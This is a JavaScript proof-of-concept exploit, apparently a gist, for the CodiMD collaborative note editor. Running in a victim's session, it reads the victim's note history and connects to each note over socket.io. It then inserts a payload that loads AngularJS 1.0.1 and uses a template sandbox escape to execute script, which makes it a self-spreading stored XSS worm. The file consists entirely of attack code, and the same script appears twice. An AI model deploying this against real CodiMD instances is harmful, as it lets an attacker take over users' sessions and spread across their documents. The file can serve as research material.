allyshka/codimd-notes-poison.js

## codimd-notes-poison.js
var host = document.location.hostname + ':' + document.location.port;
var notedummy = '//'+host+'/socket.io/?noteId=NOTE_ID&EIO=3';
var payload = '<!-- attr="--><script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.min.js></script><div ng-app>{{constructor.constructor(\'alert(1)\')()}}</div>" -->\n';

$.get('/me', function(data){
    if(data.status=="ok") {
        $.get('/history', function(data) {
            if(data.history.length > 0) {
                for(h in data.history) {
                    var currentNoteId = data.history[h].id;
                    var execute = function(nId) {
                        var sock = io.connect({
                            path: '/socket.io/',
                            query: {
                                noteId: nId
                            },
                            timeout: 5000,
                            reconnectionAttempts: 20,
                            forceNew: true
                        });
                        sock.on('connect', function (data) {
                        });
                        sock.once('doc', function (obj) {
                            console.log(obj.str);
                            if(obj.str.search('ng-app') == -1) {
                                sock.emit("operation",0,[payload],{"ranges":[{"anchor":payload.length,"head":payload.length}]});
                            }
                        });
                    };
                    execute(currentNoteId);
                }
            }
        });
    }
});
	var host = document.location.hostname + ':' + document.location.port;
	var notedummy = '//'+host+'/socket.io/?noteId=NOTE_ID&EIO=3';
	var payload = '<!-- attr="--><script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.min.js></script><div ng-app>{{constructor.constructor(\'alert(1)\')()}}</div>" -->\n';

	$.get('/me', function(data){
	if(data.status=="ok") {
	$.get('/history', function(data) {
	if(data.history.length > 0) {
	for(h in data.history) {
	var currentNoteId = data.history[h].id;
	var execute = function(nId) {
	var sock = io.connect({
	path: '/socket.io/',
	query: {
	noteId: nId
	},
	timeout: 5000,
	reconnectionAttempts: 20,
	forceNew: true
	});
	sock.on('connect', function (data) {
	});
	sock.once('doc', function (obj) {
	console.log(obj.str);
	if(obj.str.search('ng-app') == -1) {
	sock.emit("operation",0,[payload],{"ranges":[{"anchor":payload.length,"head":payload.length}]});
	}
	});
	};
	execute(currentNoteId);
	}
	}
	});
	}
	});